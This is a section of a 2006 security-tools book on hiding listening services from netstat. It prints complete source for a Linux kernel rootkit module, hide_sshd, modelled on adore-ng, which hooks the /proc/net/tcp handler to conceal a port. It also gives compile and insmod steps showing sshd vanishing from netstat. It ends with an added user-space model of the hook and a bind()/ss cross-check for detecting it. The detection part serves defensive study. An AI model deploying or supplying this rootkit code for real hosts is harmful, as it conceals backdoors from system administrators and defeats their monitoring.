7.4. Hiding from netstat

The netstat tool lists currently running network services on a host:

[notroot]$ netstat -na
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
udp        0      0 0.0.0.0:68              0.0.0.0:*
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node Path
unix  2      [ ACC ]     STREAM     LISTENING     2085   /dev/gpmctl
unix  6      [ ]         DGRAM                    1886   /dev/log
unix  2      [ ]         DGRAM                    2153
unix  2      [ ]         DGRAM                    2088
unix  2      [ ]         DGRAM                    2046
unix  2      [ ]         DGRAM                    1894

The Adore rootkit (adore-ng) allows you to hide a given set of listening services from a netstat query. netstat gets its TCP listing from /proc/net/tcp, which the kernel produces one socket per line through the tcp4_seq_show() handler that is reachable from the exported proc_net structure. The hide_sshd LKM below uses the same idea: it swaps that handler for hacked_tcp4_seq_show(), which first lets the original handler append its entry to seq->buf and then uses strnstr() to search that entry for the port to hide, written as four hexadecimal digits (0016 for port 22). If the string is found, the entry is discarded by subtracting its fixed length, TMPSZ, from seq->count, so netstat never sees the line.

7.4.1. hide_sshd.c

Following is the full source code of the hide_sshd LKM. It was written against the 2.6 kernels of the book's era; the exported proc_net symbol and the tcp_seq_afinfo layout it relies on changed in later kernels:

/*Thanks to adore-ng from Stealth for the ideas used in this code*/
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/proc_fs.h>
#include <linux/init.h>
#include <net/tcp.h>

/* from net/ipv4/tcp_ipv4.c: every /proc/net/tcp entry is padded to TMPSZ bytes */
#define TMPSZ 150

/* hide sshd */
#define PORT_TO_HIDE 22

MODULE_LICENSE("GPL");

/* saved pointer to the kernel's original tcp4_seq_show() */
int (*old_tcp4_seq_show)(struct seq_file *, void *) = NULL;

/* strstr() restricted to the first n bytes of haystack */
char *strnstr(const char *haystack, const char *needle, size_t n)
{
        char *s = strstr(haystack, needle);
        if (s == NULL)
                return NULL;
        if (s - haystack + strlen(needle) <= n)
                return s;
        else
                return NULL;
}

/* Replacement handler: let the original append its TMPSZ-byte entry to
 * seq->buf, then scan that entry for the port as four hex digits ("0016")
 * and, if found, unwind seq->count so the entry is never returned. */
int hacked_tcp4_seq_show(struct seq_file *seq, void *v)
{
        int retval = old_tcp4_seq_show(seq, v);
        char port[12];

        sprintf(port, "%04X", PORT_TO_HIDE);
        if (strnstr(seq->buf + seq->count - TMPSZ, port, TMPSZ))
                seq->count -= TMPSZ;
        return retval;
}

/* Walk proc_net's subdirectory list to the "tcp" entry; its ->data is the
 * tcp_seq_afinfo whose seq_show callback produces /proc/net/tcp. */
static int __init myinit(void)
{
        struct tcp_seq_afinfo *my_afinfo = NULL;
        struct proc_dir_entry *my_dir_entry = proc_net->subdir;

        while (strcmp(my_dir_entry->name, "tcp"))
                my_dir_entry = my_dir_entry->next;
        if ((my_afinfo = (struct tcp_seq_afinfo *)my_dir_entry->data)) {
                old_tcp4_seq_show = my_afinfo->seq_show;
                my_afinfo->seq_show = hacked_tcp4_seq_show;
        }
        return 0;
}

/* Put the original handler back on unload */
static void myexit(void)
{
        struct tcp_seq_afinfo *my_afinfo = NULL;
        struct proc_dir_entry *my_dir_entry = proc_net->subdir;

        while (strcmp(my_dir_entry->name, "tcp"))
                my_dir_entry = my_dir_entry->next;
        if ((my_afinfo = (struct tcp_seq_afinfo *)my_dir_entry->data))
                my_afinfo->seq_show = old_tcp4_seq_show;
}

module_init(myinit);
module_exit(myexit);

7.4.2. Compiling and Testing hide_sshd

The hide_sshd.c source code assumes we are trying to hide the presence of sshd running on a host. To hide any other service, change the value of PORT_TO_HIDE. For the purposes of this section, we assume that sshd is running on the host. Confirm this by running netstat:

[notroot]$ netstat -na | grep 22
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN

Use the following makefile:

obj-m += hide_sshd.o

Compile using the following make command (later kernel build systems expect M=$PWD in place of SUBDIRS=$PWD):

[notroot]$ make -C /usr/src/linux-`uname -r` SUBDIRS=$PWD modules

Insert the module:

[root]# insmod ./hide_sshd.ko

Now sshd will not be visible, because its entry is removed from /proc/net/tcp before netstat reads it. Try the netstat query again; it returns nothing:

[notroot]$ netstat -na | grep 22

Unload the module when done:

[root]# rmmod hide_sshd
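The hook only edits what /proc/net/tcp reports; the socket itself is still bound. The following is an added example (not code from the book or from adore-ng) that models hacked_tcp4_seq_show()'s filter in user space over constructed /proc/net/tcp entries and then cross-checks with a bind() probe, which still finds the hidden listener. The entry layout is abbreviated from the kernel's format (only the fields parsed here are kept accurate), the sample entries and the function names are constructed for this example, and the third sample entry is chosen so that its inode contains the digits "0016", which shows that the substring match drops more than the sshd line.

```c
/* hide_check.c: added example, not part of hide_sshd.c or adore-ng. */
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define TMPSZ 150            /* every /proc/net/tcp entry is padded to this length */
#define SAMPLE_MAX 4096

/* Append one entry padded with "%-*s\n", TMPSZ-1, as tcp4_seq_show does.
 * Field layout is abbreviated; addresses are given as the hex strings /proc uses. */
static int emit_entry(char *buf, size_t cap, int idx, const char *laddr, unsigned lport,
                      const char *raddr, unsigned rport, unsigned st, unsigned long inode)
{
    char line[256];
    size_t len = strlen(buf);
    if (len + TMPSZ + 1 > cap) return -1;
    snprintf(line, sizeof line, "%4d: %s:%04X %s:%04X %02X 00000000:00000000 00:00000000 00000000 %5u %8d %lu 1",
             idx, laddr, lport, raddr, rport, st, 0u, 0, inode);
    snprintf(buf + len, cap - len, "%-*s\n", TMPSZ - 1, line);
    return 0;
}

/* Constructed sample: sshd listening on sshd_port, httpd listening on 80, and an
 * established loopback connection whose inode (30016) contains "0016". */
static int build_sample(char *buf, size_t cap, unsigned sshd_port)
{
    buf[0] = '\0';
    if (emit_entry(buf, cap, 1, "00000000", sshd_port, "00000000", 0, 0x0A, 1234) < 0) return -1;
    if (emit_entry(buf, cap, 2, "00000000", 80, "00000000", 0, 0x0A, 5678) < 0) return -1;
    return emit_entry(buf, cap, 3, "0100007F", 0xA102, "0100007F", 80, 0x01, 30016);
}

static int chunk_has(const char *chunk, size_t n, const char *needle)
{
    size_t nl = strlen(needle), i;
    for (i = 0; i + nl <= n; i++)
        if (memcmp(chunk + i, needle, nl) == 0) return 1;
    return 0;
}

/* User-space model of the hook: search each TMPSZ-byte entry for the port as four
 * hex digits and drop the entry if found (the module does seq->count -= TMPSZ).
 * Returns the number of entries dropped. The match is a plain substring search over
 * the whole entry, so entries whose addresses, inode or counters happen to contain
 * the same four digits disappear as well. */
static size_t hook_filter(char *buf, unsigned port_to_hide)
{
    char port[12];
    size_t total = strlen(buf), in, out = 0;
    snprintf(port, sizeof port, "%04X", port_to_hide);
    for (in = 0; in + TMPSZ <= total; in += TMPSZ) {
        if (chunk_has(buf + in, TMPSZ, port)) continue;
        memmove(buf + out, buf + in, TMPSZ);
        out += TMPSZ;
    }
    buf[out] = '\0';
    return (total - out) / TMPSZ;
}

/* What a netstat-style reader sees: 1 if an entry has local port == port in state
 * 0A (TCP_LISTEN). Lines that do not parse, such as the real file's header, are skipped. */
static int proc_lists_listener(const char *text, unsigned port)
{
    const char *p = text;
    while (*p) {
        int idx; unsigned laddr, lport, raddr, rport, st;
        if (sscanf(p, "%d: %8X:%4X %8X:%4X %2X", &idx, &laddr, &lport, &raddr, &rport, &st) == 6 &&
            lport == port && st == 0x0A)
            return 1;
        p = strchr(p, '\n');
        if (!p) break;
        p++;
    }
    return 0;
}

/* Cross-check that bypasses /proc: try to bind 0.0.0.0:port. 1 = EADDRINUSE (something
 * holds the port), 0 = free, -1 = other error (e.g. EACCES below 1024 when not root). */
static int port_is_bound(unsigned port)
{
    struct sockaddr_in sa;
    int fd = socket(AF_INET, SOCK_STREAM, 0), rc;
    if (fd < 0) return -1;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_ANY);
    sa.sin_port = htons((uint16_t)port);
    rc = bind(fd, (struct sockaddr *)&sa, sizeof sa) == 0 ? 0 : (errno == EADDRINUSE ? 1 : -1);
    close(fd);
    return rc;
}

/* A listener the kernel holds but /proc/net/tcp does not show. */
static int hidden_listener(const char *proc_tcp, unsigned port)
{
    return port_is_bound(port) == 1 && !proc_lists_listener(proc_tcp, port);
}

/* Helper: open a real listener on an ephemeral loopback port so the probe has a target. */
static int open_listener(unsigned *port)
{
    struct sockaddr_in sa;
    socklen_t sl = sizeof sa;
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0) return -1;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    if (bind(fd, (struct sockaddr *)&sa, sizeof sa) < 0 || listen(fd, 1) < 0 ||
        getsockname(fd, (struct sockaddr *)&sa, &sl) < 0) { close(fd); return -1; }
    *port = ntohs(sa.sin_port);
    return fd;
}

int main(void)
{
    char buf[SAMPLE_MAX];
    unsigned port = 0;
    int fd = open_listener(&port);
    if (fd < 0 || build_sample(buf, sizeof buf, port) < 0) return 1;
    printf("before hook: %zu entries, /proc lists port %u: %d\n",
           strlen(buf) / TMPSZ, port, proc_lists_listener(buf, port));
    printf("hook dropped %zu entries\n", hook_filter(buf, port));
    printf("after hook: /proc lists port %u: %d, bind probe: %d, hidden listener: %d\n",
           port, proc_lists_listener(buf, port), port_is_bound(port), hidden_listener(buf, port));
    close(fd);
    return 0;
}
```

On a real host the same cross-check means comparing /proc/net/tcp (or netstat) against a bind() probe of the ports you care about, or against a listing obtained another way, such as ss, which uses the netlink socket-diagnostics interface rather than /proc. Either disagreement is the signature of this class of hook.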



Network Security Tools
Network Security Tools: Writing, Hacking, and Modifying Security Tools
ISBN: 0596007949
Year: 2006
Pages: 110
